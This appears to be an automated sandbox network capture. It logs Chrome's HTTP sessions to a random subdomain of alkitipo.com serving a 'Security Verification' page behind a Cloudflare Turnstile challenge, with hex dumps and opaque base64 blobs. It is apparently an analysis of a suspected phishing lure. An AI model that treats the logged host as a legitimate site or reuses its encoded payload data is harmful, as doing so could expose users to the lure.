                                                                      2025-03-19 10:29:55 UTC298INData Raw: 76 62 2b 57 78 72 6d 6b 77 36 65 6f 6d 61 43 44 6f 38 4f 77 6d 39 43 38 77 4a 44 51 30 4d 32 69 6b 39 54 64 74 4d 71 58 6d 35 50 44 72 74 50 56 70 71 43 39 35 2b 44 6c 79 4d 50 41 37 65 58 72 7a 4f 47 76 72 74 36 74 72 73 53 33 39 62 6e 37 41 4e 36 36 34 4f 7a 36 77 63 58 50 39 65 4d 4a 31 41 6e 59 33 38 51 4f 2b 63 2f 65 44 51 59 4c 42 66 51 50 46 76 49 64 43 41 66 6d 48 78 63 63 47 42 72 35 49 68 54 6b 43 67 6f 44 4c 50 37 73 35 77 55 50 38 4f 73 4a 44 41 30 30 44 44 6f 7a 39 76 6a 37 4b 50 34 7a 47 7a 49 37 4a 66 30 68 50 77 55 66 51 44 31 44 50 53 34 68 51 45 77 6e 45 6a 35 44 56 42 4d 4f 52 6a 41 35 57 6c 46 59 46 7a 6c 65 49 55 49 31 59 54 35 5a 4a 46 46 48 58 54 78 64 51 6d 42 59 58 48 42 72 53 69 74 69 51 47 35 51 55 30 73 32 56 55 35 63 56 48 4e
                                                                      Data Ascii: vb+Wxrmkw6eomaCDo8Owm9C8wJDQ0M2ik9TdtMqXm5PDrtPVpqC95+DlyMPA7eXrzOGvrt6trsS39bn7AN664Oz6wcXP9eMJ1AnY38QO+c/eDQYLBfQPFvIdCAfmHxccGBr5IhTkCgoDLP7s5wUP8OsJDA00DDoz9vj7KP4zGzI7Jf0hPwUfQD1DPS4hQEwnEj5DVBMORjA5WlFYFzleIUI1YT5ZJFFHXTxdQmBYXHBrSitiQG5QU0s2VU5cVHN
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 52 6a 6b 4a 46 59 71 48 39 68 6d 48 39 6f 66 70 79 42 72 58 32 46 63 58 36 73 67 36 47 59 67 72 65 6c 64 6e 6d 37 73 48 71 69 76 36 35 39 68 58 32 30 76 37 47 5a 76 59 71 33 6d 4a 69 39 77 36 53 4a 77 72 36 69 7a 62 43 33 78 74 79 62 75 62 58 64 32 38 4c 68 74 38 44 51 73 4c 76 61 79 75 4b 35 75 36 58 44 32 72 7a 66 32 72 44 65 34 75 37 77 37 2f 44 6d 34 37 53 39 39 64 37 7a 2b 4d 7a 35 32 2b 54 35 76 64 4c 52 43 2f 6e 74 7a 65 66 6f 41 65 44 39 7a 68 45 44 2f 73 37 4f 47 2b 50 6e 45 39 6f 57 2b 74 63 51 47 39 37 35 45 78 6a 67 46 43 73 4d 34 2b 77 57 35 65 55 77 4a 50 41 69 42 51 73 33 4a 79 38 58 4e 53 55 63 50 69 38 39 2b 77 49 76 48 44 41 7a 44 7a 38 43 52 54 30 73 4b 55 30 73 51 45 4a 4f 53 53 55 65 4c 45 70 43 56 46 51 35 4b 7a 5a 58 45 52 6f 38 56
                                                                      Data Ascii: RjkJFYqH9hmH9ofpyBrX2FcX6sg6GYgreldnm7sHqiv659hX20v7GZvYq3mJi9w6SJwr6izbC3xtybubXd28Lht8DQsLvayuK5u6XD2rzf2rDe4u7w7/Dm47S99d7z+Mz52+T5vdLRC/ntzefoAeD9zhED/s7OG+PnE9oW+tcQG975ExjgFCsM4+wW5eUwJPAiBQs3Jy8XNSUcPi89+wIvHDAzDz8CRT0sKU0sQEJOSSUeLEpCVFQ5KzZXERo8V
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 30 6d 34 6d 44 67 32 69 51 68 32 2b 46 71 59 69 69 62 4b 69 4c 73 72 75 4e 68 33 61 4e 6c 49 6d 4d 71 37 32 57 6d 70 32 57 6b 6f 61 56 78 35 36 2f 69 4c 71 6f 7a 36 57 4f 6f 35 37 4a 74 63 65 51 73 4e 65 33 73 4c 76 65 75 63 6e 44 30 37 48 63 30 62 71 6b 70 4e 6d 71 36 4c 2b 37 35 63 7a 53 77 39 4c 44 38 72 62 51 73 4e 72 75 79 4e 54 53 38 50 61 37 37 65 44 36 32 67 4c 78 34 74 7a 67 77 64 62 64 31 67 37 48 36 51 77 46 35 64 30 4d 41 2b 62 57 46 4d 77 4e 39 67 72 65 47 68 51 4b 48 68 48 31 42 2b 4d 6f 43 66 73 47 49 75 73 46 48 78 38 4f 49 4f 30 55 36 79 77 44 44 77 59 49 2b 75 30 47 44 54 51 36 45 67 73 67 49 6a 54 39 4e 54 41 6d 42 6a 30 72 47 79 73 33 52 77 35 48 44 30 73 72 49 42 4e 55 4c 46 52 4c 4e 45 30 64 58 7a 6c 68 4e 56 6b 75 51 68 39 62 58 69
                                                                      Data Ascii: 0m4mDg2iQh2+FqYiibKiLsruNh3aNlImMq72Wmp2WkoaVx56/iLqoz6WOo57JtceQsNe3sLveucnD07Hc0bqkpNmq6L+75czSw9LD8rbQsNruyNTS8Pa77eD62gLx4tzgwdbd1g7H6QwF5d0MA+bWFMwN9greGhQKHhH1B+MoCfsGIusFHx8OIO0U6ywDDwYI+u0GDTQ6EgsgIjT9NTAmBj0rGys3Rw5HD0srIBNULFRLNE0dXzlhNVkuQh9bXi
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 70 71 6d 4e 6b 59 5a 74 72 71 71 57 63 34 56 7a 69 34 61 4a 6e 35 32 42 6a 5a 39 36 6a 35 79 50 74 4b 4c 41 74 4c 57 38 71 36 6d 2f 69 5a 2b 74 6b 4e 61 4d 79 64 65 6b 32 72 6a 55 75 36 33 50 79 4c 36 61 6d 39 58 57 6e 36 50 61 71 62 2f 4c 78 38 58 4e 70 73 62 41 79 4c 44 67 31 4f 36 78 34 38 54 70 79 37 6e 71 74 66 44 56 74 2b 4c 67 7a 41 66 47 78 65 54 65 35 73 72 32 43 2b 41 4f 2b 4d 34 50 46 4e 48 54 44 51 2f 55 30 78 63 49 47 52 67 4c 33 77 41 57 44 53 48 38 46 79 6a 7a 41 50 33 39 33 51 55 4f 44 75 38 4a 48 2b 34 77 36 77 6b 4f 44 51 45 6e 43 52 51 62 46 66 35 41 46 44 4d 55 50 6a 39 44 46 6a 51 48 4d 78 78 4d 4e 55 38 67 54 53 74 54 54 43 45 70 54 69 42 41 4c 79 5a 4f 4a 52 31 4a 54 7a 4e 62 59 57 49 33 51 6c 4d 6a 4e 31 74 6c 61 46 59 38 5a 53 31
                                                                      Data Ascii: pqmNkYZtrqqWc4Vzi4aJn52BjZ96j5yPtKLAtLW8q6m/iZ+tkNaMydek2rjUu63PyL6am9XWn6Paqb/Lx8XNpsbAyLDg1O6x48Tpy7nqtfDVt+LgzAfGxeTe5sr2C+AO+M4PFNHTDQ/U0xcIGRgL3wAWDSH8FyjzAP393QUODu8JH+4w6wkODQEnCRQbFf5AFDMUPj9DFjQHMxxMNU8gTStTTCEpTiBALyZOJR1JTzNbYWI3QlMjN1tlaFY8ZS1
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 47 6d 74 67 34 57 62 74 6f 57 53 6d 61 76 42 73 58 2b 30 76 72 69 61 6c 4d 47 62 67 38 48 48 70 37 2b 4e 6d 62 4b 6e 31 63 79 4e 30 4d 43 31 30 4d 54 50 6c 71 33 41 6c 71 79 78 6f 4e 76 69 70 75 69 38 78 74 2f 57 6f 74 32 72 75 62 44 67 7a 74 4f 75 7a 65 54 78 35 4f 6e 49 32 50 66 36 36 62 37 77 32 73 76 32 30 37 66 66 2b 65 6b 42 42 67 76 63 7a 50 6e 69 33 38 6f 44 45 67 41 42 7a 75 38 4c 37 68 45 45 45 50 6e 65 41 52 4d 58 39 74 58 77 2b 66 55 68 43 43 51 5a 39 53 6a 71 2b 78 33 70 36 50 34 51 35 68 49 31 4c 67 67 6f 38 6a 4d 74 4e 76 63 65 4b 66 6b 68 46 52 73 6a 50 69 55 57 50 6b 73 2f 42 41 63 42 53 45 55 65 4f 79 34 30 4e 43 55 51 49 30 30 6c 4b 42 73 57 54 46 39 63 4c 6a 56 43 57 68 67 65 56 69 64 59 51 6d 56 6d 50 56 34 76 59 45 34 2f 4c 48 42 72
                                                                      Data Ascii: Gmtg4WbtoWSmavBsX+0vrialMGbg8HHp7+NmbKn1cyN0MC10MTPlq3AlqyxoNvipui8xt/Wot2rubDgztOuzeTx5OnI2Pf66b7w2sv207ff+ekBBgvczPni38oDEgABzu8L7hEEEPneARMX9tXw+fUhCCQZ9Sjq+x3p6P4Q5hI1Lggo8jMtNvceKfkhFRsjPiUWPks/BAcBSEUeOy40NCUQI00lKBsWTF9cLjVCWhgeVidYQmVmPV4vYE4/LHBr
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 69 32 71 4b 46 38 69 6f 79 56 66 36 57 7a 71 59 65 55 6c 4b 50 4b 7a 49 48 4e 79 35 36 46 69 73 75 79 6f 59 37 4b 6c 59 33 61 75 4e 43 63 7a 64 69 62 30 62 33 46 72 73 61 35 31 63 66 69 75 2b 6e 47 34 39 43 75 79 4f 62 55 39 4b 33 72 34 4e 50 62 35 4e 44 57 32 65 32 37 36 74 50 69 32 4e 36 2b 2f 50 7a 7a 2b 76 37 2b 42 66 37 39 37 73 66 61 7a 2b 44 67 44 67 7a 54 36 67 54 52 39 52 51 5a 43 52 63 5a 32 42 50 76 47 2b 38 56 48 79 50 39 48 79 6e 35 4c 41 41 4e 48 54 41 43 37 67 6b 42 38 42 45 4c 4b 78 66 30 44 6a 51 56 45 54 4d 36 4d 50 73 75 45 76 35 47 53 77 49 39 4c 55 63 38 4f 51 70 4a 4d 69 51 64 4a 55 74 47 56 31 42 44 58 44 68 64 4e 45 30 5a 51 79 39 58 52 6c 59 36 4f 56 51 36 4b 46 68 4d 57 32 68 46 61 55 31 43 50 53 63 76 4e 6c 63 32 56 7a 70 4a 62
                                                                      Data Ascii: i2qKF8ioyVf6WzqYeUlKPKzIHNy56FisuyoY7KlY3auNCczdib0b3Frsa51cfiu+nG49CuyObU9K3r4NPb5NDW2e276tPi2N6+/Pzz+v7+Bf797sfaz+DgDgzT6gTR9RQZCRcZ2BPvG+8VHyP9Hyn5LAANHTAC7gkB8BELKxf0DjQVETM6MPsuEv5GSwI9LUc8OQpJMiQdJUtGV1BDXDhdNE0ZQy9XRlY6OVQ6KFhMW2hFaU1CPScvNlc2VzpJb
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 5a 68 48 2b 63 6f 34 61 65 76 4c 54 47 76 4b 72 4e 77 63 79 64 78 71 53 4d 6f 4d 54 54 30 72 75 75 75 35 7a 41 7a 4b 48 41 31 4d 4c 66 30 73 65 32 35 74 66 46 32 61 32 70 71 2b 48 66 30 4d 62 70 7a 38 76 74 78 39 54 6d 79 76 71 34 37 63 37 5a 79 66 48 4e 41 38 54 7a 32 4f 4c 33 41 64 72 6c 31 51 6a 61 44 65 67 46 36 41 2f 4f 42 50 59 57 31 41 54 75 2b 74 33 62 43 74 72 65 47 4f 30 54 34 43 45 55 48 67 50 67 47 2b 66 33 41 42 34 6e 4c 69 62 72 37 76 34 41 46 77 77 5a 4b 69 6f 75 4b 52 49 56 44 54 45 50 47 51 38 46 42 43 41 62 52 43 4a 49 4b 52 34 49 4d 56 49 6d 4c 77 78 42 54 30 51 51 56 55 49 52 56 6a 34 6f 48 6a 64 66 4f 44 59 2b 55 54 74 49 58 43 41 6b 4b 56 52 4f 5a 6d 4e 5a 63 45 56 52 62 58 56 4e 4d 46 64 4b 4d 30 39 79 4f 54 42 5a 64 6a 78 32 57 48
                                                                      Data Ascii: ZhH+co4aevLTGvKrNwcydxqSMoMTT0ruuu5zAzKHA1MLf0se25tfF2a2pq+Hf0Mbpz8vtx9Tmyvq47c7ZyfHNA8Tz2OL3Adrl1QjaDegF6A/OBPYW1ATu+t3bCtreGO0T4CEUHgPgG+f3AB4nLibr7v4AFwwZKiouKRIVDTEPGQ8FBCAbRCJIKR4IMVImLwxBT0QQVUIRVj4oHjdfODY+UTtIXCAkKVROZmNZcEVRbXVNMFdKM09yOTBZdjx2WH
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 79 71 6d 37 70 4a 69 36 6a 38 2b 6c 31 64 57 65 78 4a 4b 72 6f 38 69 59 78 35 79 5a 74 75 4b 65 30 72 36 33 75 65 4f 2b 76 65 4b 71 70 36 33 58 77 2b 37 52 7a 4d 66 70 72 62 58 6e 31 37 47 77 35 2f 47 36 7a 65 72 32 36 77 4c 41 37 4f 33 32 30 65 41 48 32 2f 72 33 41 65 6b 43 2b 75 67 52 79 65 58 6b 45 52 54 74 35 78 41 47 38 65 55 4d 37 68 45 63 45 50 4c 39 46 42 48 34 41 67 49 65 34 75 76 32 36 52 6b 63 4b 76 37 72 4e 51 63 48 4d 78 51 4b 4b 2f 4c 35 50 41 77 4d 47 2f 6b 41 4c 79 55 31 42 54 4d 71 52 68 63 35 43 43 77 62 50 41 77 62 43 55 4e 48 4e 69 68 4e 4d 54 6f 53 52 30 70 55 53 54 63 78 54 52 39 55 4e 31 56 69 55 6b 68 64 62 46 78 4e 58 43 56 6b 52 6b 31 4d 52 47 4e 48 4e 54 68 48 61 32 39 76 55 6d 68 57 50 55 46 64 58 44 35 76 51 33 46 7a 61 47 71
                                                                      Data Ascii: yqm7pJi6j8+l1dWexJKro8iYx5yZtuKe0r63ueO+veKqp63Xw+7RzMfprbXn17Gw5/G6zer26wLA7O320eAH2/r3AekC+ugRyeXkERTt5xAG8eUM7hEcEPL9FBH4AgIe4uv26RkcKv7rNQcHMxQKK/L5PAwMG/kALyU1BTMqRhc5CCwbPAwbCUNHNihNMToSR0pUSTcxTR9UN1ViUkhdbFxNXCVkRk1MRGNHNThHa29vUmhWPUFdXD5vQ3FzaGq
                                                                      2025-03-19 10:29:55 UTC1369INData Raw: 4a 71 67 78 61 65 76 79 4a 50 46 71 38 62 56 72 39 61 2b 31 4d 32 5a 30 39 2f 54 76 65 48 51 33 36 62 6c 71 37 65 74 7a 71 6d 76 35 76 50 54 7a 4d 43 74 2b 62 50 58 39 4d 37 58 74 50 6e 76 41 74 6e 35 30 76 4c 42 77 2f 54 63 34 63 6e 4b 2b 74 6a 6f 43 65 45 4a 34 64 49 4e 39 67 66 74 35 75 62 6c 39 39 72 6f 36 76 44 36 49 78 6f 4e 34 67 4c 31 43 51 41 68 39 2f 63 70 2b 77 55 4c 36 68 34 75 41 78 66 75 45 2f 6a 35 39 52 50 31 45 41 6f 4e 4b 78 30 59 50 55 54 33 4e 53 68 41 48 78 4e 4a 49 45 67 35 50 42 39 45 55 52 4a 51 45 6b 67 31 4f 6c 45 61 47 55 70 55 4e 79 35 66 51 52 30 61 4d 69 41 68 4e 55 56 44 49 32 42 6a 59 6b 5a 70 53 57 68 47 52 44 39 47 54 45 46 53 4e 55 52 76 52 30 64 6f 53 7a 4e 65 64 48 42 57 57 57 56 78 61 57 42 49 68 31 75 49 5a 49 42 65
                                                                      Data Ascii: JqgxaevyJPFq8bVr9a+1M2Z09/TveHQ36blq7etzqmv5vPTzMCt+bPX9M7XtPnvAtn50vLBw/Tc4cnK+tjoCeEJ4dIN9gft5ubl99ro6vD6IxoN4gL1CQAh9/cp+wUL6h4uAxfuE/j59RP1EAoNKx0YPUT3NShAHxNJIEg5PB9EURJQEkg1OlEaGUpUNy5fQR0aMiAhNUVDI2BjYkZpSWhGRD9GTEFSNURvR0doSzNedHBWWWVxaWBIh1uIZIBe


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.649726104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC413OUTGET /favicon.ico HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC885INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Cache-Control: no-store
                                                                      X-Content-Type-Options: nosniff
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jlJb%2FqhNaTlfOW6Q9BCL1%2B6TFDJR8POtGhBxZrqPEZooPRClnZz24yW6%2BATzIUR6A3eDXgHFDjdMCtzuIt8pPJRhMrwA7Gdrll%2FrruY4GF6yrUzoxCgx%2Bba%2Fj%2FekAog1Z0w4thQz%2Bpsvtu5Kjec7D4sDPT%2BwOEEa8g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a9ffa74dc50-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=614&min_rtt=607&rtt_var=242&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=985&delivery_rate=4361445&cwnd=249&unsent_bytes=0&cid=e362dc9b30794241&ts=80&x=0"
                                                                      2025-03-19 10:29:55 UTC484INData Raw: 35 64 32 0d 0a 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 53 65 63 75 72 69 74 79 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74
                                                                      Data Ascii: 5d2 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Security Verification</title> <script src="https://challenges.cloudflare.com/t
                                                                      2025-03-19 10:29:55 UTC1013INData Raw: 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 32 31 32 31 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: n-items: center; height: 100vh; margin: 0; font-family: Arial, sans-serif; } @media (prefers-color-scheme: dark) { body { background-color: #121212;
                                                                      2025-03-19 10:29:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.64972735.190.80.14431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:55 UTC582OUTPOST /report/v4?s=1o%2BY4JGplPtjRKrCUDf1n5KY6V%2BVY9biWCrI4ZC%2FIcrQQ1vk1VyMWCxPBGGp1o3elrpjSy7yoi91aW8BrknNrpWJfCpkaeghCv4FkeuFl8%2BCG6%2BwJ%2FGDtpWrcanjjYK5nwWKVjxKgfsCsDiE17x7zLfv3q4xwNQj%2FA%3D%3D HTTP/1.1
                                                                      Host: a.nel.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Content-Length: 535
                                                                      Content-Type: application/reports+json
                                                                      Origin: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:55 UTC535OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 35 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 2e 31 33 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 36 62 37 63 31 62 65 35 65 61 36 38 36 64 36 63
                                                                      Data Ascii: [{"age":1,"body":{"elapsed_time":157,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.5.130","status_code":405,"type":"http.error"},"type":"network-error","url":"https://a6b7c1be5ea686d6c
                                                                      2025-03-19 10:29:55 UTC214INHTTP/1.1 200 OK
                                                                      Content-Length: 0
                                                                      access-control-allow-origin: *
                                                                      vary: Origin
                                                                      date: Wed, 19 Mar 2025 10:29:55 GMT
                                                                      Via: 1.1 google
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.649728104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:56 UTC638OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:56 UTC442INHTTP/1.1 400 Bad Request
                                                                      Date: Wed, 19 Mar 2025 10:29:56 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 14
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      cf-chl-out: TU2DuevMfVA7c2S9PM16vFOKbd6FynL+pcWeIZLZ0zgtdK4a8o9m1GHp7Uv5i++LwxC5zZOsW22HC4MFFLNPbw==$jdhB9Gnsv/gfXE8uc1hWpw==
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4aa6a9a98e9a-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:56 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                                      Data Ascii: {"err":100280}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.649729104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:57 UTC827OUTGET /cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:57 UTC200INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:57 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4aab8a39d2d2-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 35 08 02 00 00 00 4e 68 6b da 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRZ5NhkIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.649730104.18.94.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:57 UTC468OUTGET /cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:57 UTC200INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:57 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 61
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4aac3e274d56-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:29:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5a 00 00 00 35 08 02 00 00 00 4e 68 6b da 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                      Data Ascii: PNGIHDRZ5NhkIDAT$IENDB`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.649731104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:58 UTC856OUTGET /cdn-cgi/challenge-platform/h/g/pat/922c4a999a2565e0/1742380195702/13a2904f9ce012e84732ed91b64145029ca303305d8e5d33f08cbc9075eb3842/89GlKLJ1vXuz6E7 HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=0
                                                                      sec-ch-ua-platform: "Windows"
